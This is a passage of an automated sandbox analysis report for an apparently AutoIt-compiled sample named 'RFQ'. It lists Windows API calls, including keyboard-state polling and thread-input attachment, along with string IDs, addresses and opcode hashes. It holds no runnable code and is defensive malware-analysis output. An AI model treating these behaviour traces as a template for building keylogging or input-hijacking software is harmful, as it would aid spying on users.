                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                                          • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: ErrorMode$DriveType
                                                                          • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                                          • API String ID: 2907320926-3566645568
                                                                          APIs
                                                                            • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                          • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                                          • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                                          • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                                          • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                                          • DeleteObject.GDI32(00630053), ref: 00470A04
                                                                          • DestroyIcon.USER32(00690072), ref: 00470A1C
                                                                          • DeleteObject.GDI32(00000001), ref: 00470A34
                                                                          • DestroyWindow.USER32(0055005C), ref: 00470A4C
                                                                          • DestroyIcon.USER32(?), ref: 00470A73
                                                                          • DestroyIcon.USER32(?), ref: 00470A81
                                                                          • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                                          Similarity
                                                                          • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                                          • String ID:
                                                                          • API String ID: 1237572874-0
                                                                          APIs
                                                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                                          • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                                          • VariantInit.OLEAUT32(?), ref: 004793E1
                                                                          • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                                          • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                                          • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                                          • VariantClear.OLEAUT32(?), ref: 00479489
                                                                          • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                                          • VariantClear.OLEAUT32(?), ref: 004794CA
                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                                          Similarity
                                                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                          • String ID:
                                                                          • API String ID: 2706829360-0
                                                                          APIs
                                                                          • GetKeyboardState.USER32(?), ref: 0044480E
                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                                          • GetKeyState.USER32(000000A0), ref: 004448AA
                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                                          • GetKeyState.USER32(000000A1), ref: 004448D9
                                                                          • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                                          • GetKeyState.USER32(00000011), ref: 00444903
                                                                          • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                                          • GetKeyState.USER32(00000012), ref: 0044492D
                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                                          • GetKeyState.USER32(0000005B), ref: 00444958
                                                                          Similarity
                                                                          • API ID: State$Async$Keyboard
                                                                          • String ID:
                                                                          • API String ID: 541375521-0
                                                                          APIs
                                                                          Similarity
                                                                          • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                          • String ID:
                                                                          • API String ID: 3413494760-0
                                                                          APIs
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: AddressProc_free_malloc$_strcat_strlen
                                                                          • String ID: AU3_FreeVar
                                                                          • API String ID: 2634073740-771828931
                                                                          APIs
                                                                          • CoInitialize.OLE32 ref: 0046C63A
                                                                          • CoUninitialize.OLE32 ref: 0046C645
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                            • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                                            • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                                          • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                                          • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                                          • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                                          • IIDFromString.OLE32(?,?), ref: 0046C705
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                          • API String ID: 2294789929-1287834457
                                                                          • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                          • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                                          • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                          • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                                          APIs
                                                                            • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                                            • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                                            • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                                            • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                                          • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                                          • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                                          • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                                          • ReleaseCapture.USER32 ref: 0047116F
                                                                          • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                          • API String ID: 2483343779-2107944366
                                                                          • Opcode ID: 20a5a3ce7c175183900f948b12cd71fc676271c7bfbce6bb48b8262f94f29e03
                                                                          • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                                          • Opcode Fuzzy Hash: 20a5a3ce7c175183900f948b12cd71fc676271c7bfbce6bb48b8262f94f29e03
                                                                          • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                                          • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                                          • _wcslen.LIBCMT ref: 00450720
                                                                          • _wcscat.LIBCMT ref: 00450733
                                                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                                          • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Window_wcscat_wcslen
                                                                          • String ID: -----$SysListView32
                                                                          • API String ID: 4008455318-3975388722
                                                                          • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                          • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                                          • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                          • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                                          APIs
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                                          • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                                          • GetParent.USER32 ref: 00469C98
                                                                          • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                                          • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                                          • GetParent.USER32 ref: 00469CBC
                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 2360848162-1403004172
                                                                          • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                          • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                                          • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                          • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                                          • String ID:
                                                                          • API String ID: 262282135-0
                                                                          • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                          • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                                          • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                          • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                                          APIs
                                                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                                          • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                                          • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                                          • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                                          • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                                          • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$LongWindow
                                                                          • String ID:
                                                                          • API String ID: 312131281-0
                                                                          • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                          • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                                          • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                          • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                                          APIs
                                                                            • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                                          • SendMessageW.USER32(75A523D0,00001001,00000000,?), ref: 00448E16
                                                                          • SendMessageW.USER32(75A523D0,00001026,00000000,?), ref: 00448E25
                                                                            • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                          • String ID:
                                                                          • API String ID: 3771399671-0
                                                                          • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                          • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                                                          • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                          • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                                                          APIs
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                                          • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                          • String ID:
                                                                          • API String ID: 2156557900-0
                                                                          • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                          • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                                          • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                          • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                          • API String ID: 0-1603158881
                                                                          • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                          • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                                          • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                          • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                                          APIs
                                                                          • CreateMenu.USER32 ref: 00448603
                                                                          • SetMenu.USER32(?,00000000), ref: 00448613
                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                                          • IsMenu.USER32(?), ref: 004486AB
                                                                          • CreatePopupMenu.USER32 ref: 004486B5
                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                                          • DrawMenuBar.USER32 ref: 004486F5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                          • String ID: 0
                                                                          • API String ID: 161812096-4108050209
                                                                          • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                          • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                                          • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                          • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0b34b3a5b5d670eb49a5e2d7b5cd424f37d7569b2aa50e3450060746f4beba41
                                                                          • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                                                          • Opcode Fuzzy Hash: 0b34b3a5b5d670eb49a5e2d7b5cd424f37d7569b2aa50e3450060746f4beba41
                                                                          • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                          • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                                                                          • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                          • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                                                                          APIs
                                                                            • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                            • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                                          • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                          • String ID:
                                                                          • API String ID: 978794511-0
                                                                          • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                          • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                                                          • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                          • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                                                          Memory Dump Source
